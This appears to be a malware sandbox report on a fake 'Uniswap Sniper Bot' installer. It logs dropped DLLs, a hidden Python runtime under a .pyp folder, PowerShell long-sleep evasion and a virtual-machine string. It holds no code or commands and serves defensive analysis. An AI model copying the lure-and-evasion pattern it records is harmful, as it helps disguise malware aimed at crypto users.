Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 893
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 831
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3033
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1004

Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\select.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\secp256k1\prebuilds\win32-x64\secp256k1.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_decimal.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libGLESv2.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\System.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\keccak\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_ssl.pyd	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416	Thread sleep count: 3033 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948	Thread sleep count: 1004 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\Code Cache\wasm FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\Code Cache\js FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\blob_storage\e9da6f7f-3c69-4200-bf22-e5f4e322bed4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\Cache\Cache_Data FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File opened: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File opened: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File opened: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\locales	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File opened: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File opened: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds	Jump to behavior
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	File opened: C:\Users\user\AppData\Local\Temp\nsu535F.tmp\7z-out\resources\app.asar.unpacked	Jump to behavior

Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware Virtual Webcam
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Adreno (TM) 418Adreno (TM) 530Adreno (TM) 540GL_EXT_texture_lod_biasARB_draw_buffersGL_ARB_texture_swizzleGL_EXT_texture_swizzleGL_ARB_shader_bit_encodingGL_ARB_shading_language_packingGL_ARB_explicit_attrib_locationGL_ARB_explicit_uniform_locationGL_ARB_texture_gatherGL_ARB_texture_cube_map_arrayGL_ARB_pixel_buffer_objectGL_EXT_pixel_buffer_objectGL_EXT_draw_buffers2GL_ARB_fragment_shaderGL_ARB_shader_texture_lodGL_ARB_shader_viewport_layer_arrayGL_NV_viewport_array2GL_NV_texture_border_clampGL_ARB_robust_buffer_access_behaviorGL_EXT_framebuffer_sRGBGL_ARB_framebuffer_sRGBGL_ARB_gpu_shader5functions->standard == STANDARD_GL_DESKTOP && isAMDfunctions->standard == STANDARD_GL_DESKTOP && isIntelisIntel && !IsSandyBridge(device) && !IsIvyBridge(device) && !IsHaswell(device)IsApple() && isIntelisIntel && IsApple() && IsSkylake(device) && GetMacOSVersion() < OSVersion(10, 13, 2)isIntel \|\| isAMDIsLinux() && functions->standard == STANDARD_GL_DESKTOP && 